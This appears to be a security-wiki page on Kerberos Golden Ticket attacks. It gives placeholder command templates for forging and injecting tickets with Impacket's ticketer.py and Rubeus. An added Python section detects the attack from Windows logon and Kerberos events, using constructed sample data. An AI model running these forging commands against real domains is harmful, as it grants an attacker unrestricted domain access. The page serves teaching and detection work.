Theory
Abuse - UNIX-like
Impacket’s Ticketer.py
Ticketer.py
ticketer.py -nthash '<KRBTGT_NTHASH>' -domain '<DOMAIN>' -domain-sid '<DOMAIN_SID>' '<USER>'
Abuse - Windows
Rubeus
Rubeus.exe
Injecting the Golden Ticket into the current Logon Session
.\Rubeus.exe golden /rc4:<NT_HASH> /domain:<DOMAIN> /sid:<DOMAIN_SID> /user:<USER> /ptt
Injecting the Golden Ticket into a new Logon Session
- Creating a new Logon Session (Type 9 - NewCredentials) with dummy credentials (cmd.exe or powershell.exe)
runas.exe /netonly /user:test cmd.exe
- Forging the Golden Ticket
.\Rubeus.exe golden /rc4:<NT_HASH> /domain:<DOMAIN> /sid:<DOMAIN_SID> /user:<USER> /nowrap
- Injecting the Golden Ticket into the new Logon Session
.\Rubeus.exe ptt /ticket:<BASE64_BLOB>
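The defender's view of the Windows procedures above, as an added example that is not part of the original page: `runas.exe /netonly` records a Security event 4624 with Logon Type 9 from the `seclogo` logon process, and a forged TGT is never issued by the KDC, so service ticket requests (4769) appear on the domain controller without a preceding TGT request (4768). The flattened field names, the `(user, ip)` correlation key and the sample events are constructed assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample records (not real logs). Field names are simplified
# assumptions; real 4624/4768/4769 events need normalizing into this shape first.
EVENTS = [
    {"time": "2024-05-01T08:00:00", "id": 4768, "user": "alice", "ip": "10.0.0.21"},
    {"time": "2024-05-01T08:05:00", "id": 4769, "user": "alice", "ip": "10.0.0.21",
     "service": "cifs/fs01"},
    {"time": "2024-05-01T09:10:00", "id": 4624, "user": "bob", "host": "WS07",
     "logon_type": 9, "logon_process": "seclogo"},
    {"time": "2024-05-01T09:12:00", "id": 4769, "user": "Administrator",
     "ip": "10.0.0.37", "service": "cifs/dc01"},
    {"time": "2024-05-01T09:30:00", "id": 4624, "user": "carol", "host": "WS02",
     "logon_type": 2, "logon_process": "User32"},
]

TGT_LIFETIME = timedelta(hours=10)  # default maximum user ticket lifetime in AD

def netonly_logons(events):
    """Return 4624 events with Logon Type 9 (NewCredentials) created via seclogo."""
    return [e for e in events
            if e["id"] == 4624 and e.get("logon_type") == 9
            and e.get("logon_process", "").strip().lower() == "seclogo"]

def tgs_without_tgt(events, window=TGT_LIFETIME):
    """Return 4769 events with no 4768 for the same (user, ip) inside the window."""
    last_tgt = {}   # (user, ip) -> time of the most recent 4768
    hits = []
    for e in sorted(events, key=lambda ev: ev["time"]):
        when = datetime.fromisoformat(e["time"])
        key = (e["user"].lower(), e.get("ip"))
        if e["id"] == 4768:
            last_tgt[key] = when
        elif e["id"] == 4769:
            seen = last_tgt.get(key)
            if seen is None or when - seen > window:
                hits.append(e)
    return hits

if __name__ == "__main__":
    for e in netonly_logons(EVENTS):
        print("Type 9 seclogo logon:", e["host"], e["user"], e["time"])
    for e in tgs_without_tgt(EVENTS):
        print("TGS request without TGT:", e["user"], e["ip"], e["service"])
```

Both checks are heuristics: legitimate `runas /netonly` use, incomplete log collection across domain controllers and log rotation all produce hits, so treat results as leads to correlate rather than verdicts.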